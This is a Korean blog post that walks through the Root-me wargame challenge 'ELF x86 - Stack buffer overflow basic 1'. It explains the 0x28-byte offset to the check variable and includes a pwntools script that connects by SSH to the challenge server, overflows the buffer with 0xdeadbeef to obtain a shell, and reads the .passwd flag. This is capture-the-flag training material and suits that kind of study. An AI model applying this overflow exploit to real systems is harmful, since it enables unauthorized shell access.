본문 바로가기
Wargame/Root-me

ELF x86 - Stack buffer overflow basic 1

by Anatis 2021. 3. 27.

이번 문제는 root-me.org 의 system 첫 문제인 stack-buffer-overflow이다. 이 사이트는 기술을 익히기에 좋은 워게임 사이트인거 같다.

 

접속 정보를 제공한다.

 

접속을 해서 보면 Mitigation 상태를 보여주고 파일들이 보이는데 소스 코드를 제공한다. 소스 코드는 문제 사이트에도 있다.

check가 0xdeadbeef면 쉘을 획득할 수 있다. 

 

buf의 시작주소 부터 check까지의 거리는 0x28이다. 이제 check를 0xdeadbeef도 덮어보자.

 

from pwn import *

user = 'app-systeme-ch13'
host = 'challenge02.root-me.org'
port = 2222
password = 'app-systeme-ch13'

s = ssh(user, host, port, password)
p = s.process('./ch13')

payload = 'A'*40
payload += p32(0xdeadbeef)
p.sendline(payload)

p.interactive()

ls -al 명령어로 보면 .passwd가 있다 확인해보니 값이 나온다.

댓글